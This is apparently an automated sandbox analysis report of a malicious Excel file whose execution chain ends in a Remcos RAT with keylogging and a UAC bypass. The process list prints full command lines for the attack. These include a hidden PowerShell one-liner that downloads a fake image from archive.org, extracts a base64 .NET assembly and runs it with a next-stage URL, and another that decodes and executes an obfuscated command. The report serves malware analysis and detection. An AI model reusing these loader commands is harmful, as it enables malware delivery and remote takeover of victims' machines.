                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:8
                                              Start time:11:49:01
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline"
                                              Imagebase:0x13f380000
                                              File size:2'758'280 bytes
                                              MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:9
                                              Start time:11:49:02
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE61B.tmp" "c:\Users\user\AppData\Local\Temp\sepiowy3\CSC80F6A6947D640689146C75DBBC3F89.TMP"
                                              Imagebase:0x13fa10000
                                              File size:52'744 bytes
                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:11
                                              Start time:11:49:06
                                              Start date:09/09/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS"
                                              Imagebase:0xffea0000
                                              File size:168'960 bytes
                                              MD5 hash:045451FA238A75305CC26AC982472367
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:12
                                              Start time:11:49:07
                                              Start date:09/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '…';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                              Imagebase:0x13faa0000
                                              File size:443'392 bytes
                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:14
                                              Start time:11:49:07
                                              Start date:09/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                              Imagebase:0x13faa0000
                                              File size:443'392 bytes
                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:15
                                              Start time:11:49:13
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:16
                                              Start time:11:49:13
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:17
                                              Start time:11:49:13
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.624187857.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.624187857.0000000000811000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:false

                                              Target ID:19
                                              Start time:11:49:16
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:20
                                              Start time:11:49:16
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:21
                                              Start time:11:49:16
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:22
                                              Start time:11:49:16
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:23
                                              Start time:11:49:16
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:24
                                              Start time:11:49:16
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:25
                                              Start time:11:49:16
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:26
                                              Start time:11:49:16
                                              Start date:09/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                                              Imagebase:0xe0000
                                              File size:64'704 bytes
                                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true


                                              Module: Sheet1

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Sheet1"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Module: Sheet2

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Sheet2"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Module: Sheet3

                                              Declaration

                                              Attribute VB_Name = "Sheet3"
                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True

                                              Module: ThisWorkbook

                                              Declaration

                                              Attribute VB_Name = "ThisWorkbook"
                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True

                                                Memory Dump Source
                                                • Source File: 00000004.00000003.474028806.0000000003050000.00000010.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_3_3050000_mshta.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                • Instruction ID: 8f977652830568657662fba1f90dc8108fb0e19f6b1c0e3f422b98a6a1d99d35
                                                • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                • Instruction Fuzzy Hash:

                                                Execution Graph

                                                Execution Coverage: 4.4%
                                                Dynamic/Decrypted Code Coverage: 0%
                                                Signature Coverage: 0%
                                                Total number of Nodes: 3
                                                Total number of Limit Nodes: 0
                                                (graph rendered on the original page; 3 nodes: 7fe898b7ae1 -> 7fe898b7af1 URLDownloadToFileW -> 7fe898b7c00)

                                                Control-flow Graph

                                                (graph rendered on the original page; basic blocks 7fe898b7018-7fe898b7c23, call to URLDownloadToFileW)
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496736523.000007FE898B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE898B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe898b0000_powershell.jbxd
                                                Similarity
                                                • API ID: DownloadFile
                                                • String ID:
                                                • API String ID: 1407266417-0
                                                • Opcode ID: e8d85f31ef8d0d04108b71b6ad7fab497301dfbb28909e82bb780397de18ae1c
                                                • Instruction ID: b93c8d49f5bd9e95787c0ca8822e5751f3b626f88b169b8611ee2f78eb9299f3
                                                • Opcode Fuzzy Hash: e8d85f31ef8d0d04108b71b6ad7fab497301dfbb28909e82bb780397de18ae1c
                                                • Instruction Fuzzy Hash: 47319E31918A1C9FDB58EF5CD885BA9B7E1FB69321F00822ED04ED3651DB74A8068B81

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (Fu$0c}$0c}$0c}$8Fu
                                                • API String ID: 0-2339449091
                                                • Opcode ID: e4408c282d90fe65c017c5cdeaf773e6d3a8e6ec53bcf3ea84bd796485be5773
                                                • Instruction ID: 1497ab9942e8992a0977a4a0f5d91e490141bd83a9fdf28716da7125a8eae825
                                                • Opcode Fuzzy Hash: e4408c282d90fe65c017c5cdeaf773e6d3a8e6ec53bcf3ea84bd796485be5773
                                                • Instruction Fuzzy Hash: D5C1142091DAC90FE74AA72C58546BA7FE1EF4A354F1801EFD48ED72B3D618AC52C361

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8h($8h($8h($8h($xFu
                                                • API String ID: 0-2780450859
                                                • Opcode ID: 90c6a2c71af2d210e2de9b588b8b2602fefa52866a0a900fbb3658af56a84662
                                                • Instruction ID: 3c5d6b5ee94b06e1f4aebcae70715c9dab1ff8ba94d8afca5a6fa42e348f4b93
                                                • Opcode Fuzzy Hash: 90c6a2c71af2d210e2de9b588b8b2602fefa52866a0a900fbb3658af56a84662
                                                • Instruction Fuzzy Hash: A5A1DD20A0D7C90FE35B973858646607FE1EF4B254B2D41EBD48DCB1B3EA189C5AC361

                                                Control-flow Graph

                                                (graph rendered on the original page; basic blocks 7fe89988549-7fe89988b96, no API calls annotated)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0c}$8=}
                                                • API String ID: 0-431810181
                                                • Opcode ID: bf56f8e5d858fba83af4b2bc718f1ed87a4731f566510a1720b5e7b95c621f20
                                                • Instruction ID: 3d3673bbf61a658f3b79488428caeda4436adc32865adfb18674e9717af95fc3
                                                • Opcode Fuzzy Hash: bf56f8e5d858fba83af4b2bc718f1ed87a4731f566510a1720b5e7b95c621f20
                                                • Instruction Fuzzy Hash: 9922263090CBC94FE78AEB2C94546797BE2FF9A340F1501AED04ED72A3DA24AC56C751

                                                Control-flow Graph

                                                (graph rendered on the original page; basic blocks 7fe899856f2-7fe899859cc, no API calls annotated)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0c}$V
                                                • API String ID: 0-3170808469
                                                • Opcode ID: 2c0c6345cf54bf8d1dad45d22f2fdc73c763a094f7dd0f66e9e5bb3acee1ea59
                                                • Instruction ID: 49893628579b4657ac8bef12aac44eb2c7563fe7b9f68cdf8c2020ee3c203f6d
                                                • Opcode Fuzzy Hash: 2c0c6345cf54bf8d1dad45d22f2fdc73c763a094f7dd0f66e9e5bb3acee1ea59
                                                • Instruction Fuzzy Hash: A1A1363191DBCC0FE746A7289C156BA3FA4EF8B250F1501EBE48DD71A3D614AD1AC362

                                                Control-flow Graph

                                                (graph rendered on the original page; basic blocks 7fe898b7ae1-7fe898b7c23, call to URLDownloadToFileW)
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496736523.000007FE898B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE898B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe898b0000_powershell.jbxd
                                                Similarity
                                                • API ID: DownloadFile
                                                • String ID:
                                                • API String ID: 1407266417-0
                                                • Opcode ID: 18778eb8516249132d65e376410f08c5a71e8a4e14f4d10781176ac9f482616f
                                                • Instruction ID: f44bbe83aea1951882a072c2417e993dc7607ab0254bd6c9c8f8350c815feed7
                                                • Opcode Fuzzy Hash: 18778eb8516249132d65e376410f08c5a71e8a4e14f4d10781176ac9f482616f
                                                • Instruction Fuzzy Hash: B041167080CB899FDB16DB5898547AABBF4FB56321F04426FD089D3592CB646806CB81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0c}$h.{
                                                • API String ID: 0-387538172
                                                • Opcode ID: 4df46c14f76ed4fe63979d43981a9cdbf0672c17e7df3764ec09a000b65510c0
                                                • Instruction ID: 724e7128bfab4b796eef85ef7bb4b7a25f384ff35c7e96a201b6a7b831c0e7b5
                                                • Opcode Fuzzy Hash: 4df46c14f76ed4fe63979d43981a9cdbf0672c17e7df3764ec09a000b65510c0
                                                • Instruction Fuzzy Hash: DBA1472090EBC90FD747A77898246A67FF5EF4B214F1901EBD48DCB1B3D618991AC362

                                                Control-flow Graph

                                                (graph rendered on the original page; basic blocks 7fe89983a81-7fe89983c80, no API calls annotated)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: XhB$h.{$h.{$h.{$h.{$h.{$h.{
                                                • API String ID: 0-2272823907
                                                • Opcode ID: 8e3f776959b9733b05d5ba1a6f708fc0c0146bb3435a1775b411c39dfdb150d3
                                                • Instruction ID: 5038a6da4350781ad87aaeb07305aff6ba874988b10e833143c80923d67f8fa8
                                                • Opcode Fuzzy Hash: 8e3f776959b9733b05d5ba1a6f708fc0c0146bb3435a1775b411c39dfdb150d3
                                                • Instruction Fuzzy Hash: 7061F321A0D6CA4FE717932C58242B67FB2EF8B354F2941EBD08DEB1B3D6186819C351

                                                Control-flow Graph

                                                (graph rendered on the original page; basic blocks 7fe899804c2-7fe899808e7, no API calls annotated)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (U/$(U/$(U/$0T}$0c}$8=}
                                                • API String ID: 0-3578353684
                                                • Opcode ID: dd17834e94354e9b3174dbad10622baadbe633636f5adfaed6ea4443f572a6ba
                                                • Instruction ID: 00e8bd6f259f981fd4506b54c7b626880da89c83a9d9c976bc3154f7b74fd451
                                                • Opcode Fuzzy Hash: dd17834e94354e9b3174dbad10622baadbe633636f5adfaed6ea4443f572a6ba
                                                • Instruction Fuzzy Hash: 5DE1D02190D7CA0FE71A973858252B97FE1EF47254F1901EFD48AEB1B3D6186816C3A2

                                                Control-flow Graph

                                                (graph rendered on the original page; basic blocks 7fe899800dd-7fe899804c1, no API calls annotated)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (U/$(U/$(U/$0T}$0c}$8=}
                                                • API String ID: 0-3578353684
                                                • Opcode ID: e66efb26d84a4374e9a809661203797f69798a6b6224961d3099e8c293dc3a57
                                                • Instruction ID: c57cbddc36d4802953cb60a62704fb47a3d2592fa65a8ce70f0eca2686c246f4
                                                • Opcode Fuzzy Hash: e66efb26d84a4374e9a809661203797f69798a6b6224961d3099e8c293dc3a57
                                                • Instruction Fuzzy Hash: 42D1023090D7CA0FE70AA73858252B97FE1EF47654F1900EFD48EE71B3D618685683A2

                                                Control-flow Graph

                                                (graph rendered on the original page; basic blocks 7fe8998380a-7fe89983a36, no API calls annotated)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.496803221.000007FE89980000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89980000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7fe89980000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 88;$XhB$`kx$h.{$h.{
                                                • API String ID: 0-3531803333
                                                • Opcode ID: ca58a27fcf391b3d343dd6151bb164bd19dbf397fcba38ee914bdf6f6d879c5b
                                                • Instruction ID: 9e3f77025a2f6dccb724747fd01c1599de87477494c75a7ac7fafdab2d64d41a
                                                • Opcode Fuzzy Hash: ca58a27fcf391b3d343dd6151bb164bd19dbf397fcba38ee914bdf6f6d879c5b
                                                • Instruction Fuzzy Hash: 9C811F2190EBD60FEB43937858656A57FF1DF4B660B0E41EBC489DB0B3D509AC0AC362

                                                Execution Graph

                                                Execution Coverage:12.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:41
                                                Total number of Limit Nodes:1

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522836361.000007FE89950000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89950000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89950000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (bS$0T}$0T}$0T}$0c}$0c}$0c}$8=}$8=}$8=}$XhB$XhB$r6&$r6&
                                                • API String ID: 0-1540602673
                                                • Opcode ID: 826419631c0ecce7800ab9893de51294f51a6557e10ee001ef9c738031697867
                                                • Instruction ID: fda412718c9fc84968cdea80990d630e3bff37538a75c313d5ae3d6951c04606
                                                • Opcode Fuzzy Hash: 826419631c0ecce7800ab9893de51294f51a6557e10ee001ef9c738031697867
                                                • Instruction Fuzzy Hash: DD52E020A0DBCA0FE75BA77858242767FE1EF4A254F1901EBD48EC71B3EA18AC55C351

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522836361.000007FE89950000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89950000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89950000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (U/$(U/$(U/$0T}$0T}$0c}$0c}$8=}$8=}$P*0
                                                • API String ID: 0-2426854366
                                                • Opcode ID: 030fde3b7ec97d48eb2c368932a650bd7aa2c7e58437087b3c98cdad76308015
                                                • Instruction ID: ad48a8f9528b5451d6f7b6b264c8fefe338d0e4625bcfb50f5a22a44e037c005
                                                • Opcode Fuzzy Hash: 030fde3b7ec97d48eb2c368932a650bd7aa2c7e58437087b3c98cdad76308015
                                                • Instruction Fuzzy Hash: A232243090D7C94FE74AA77858162BA7FE1EF87254F1901EAD48EC71B3D618AC16C392

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 7ad9f9efcf76dcb7270f3823a3889fe1f256508a865974cd71ea866bcc75c42a
                                                • Instruction ID: 2b23d145a96c23e2b254274509eaa9f28acdb9a2f824543dc52a85ceb82da8a6
                                                • Opcode Fuzzy Hash: 7ad9f9efcf76dcb7270f3823a3889fe1f256508a865974cd71ea866bcc75c42a
                                                • Instruction Fuzzy Hash: B4C11770908A5D8FDB99DF18C854BE9BBF1FB69311F0001AAD04EE3291DB75AA85CF40

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.522722862.000007FE89880000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89880000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7fe89880000_powershell.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
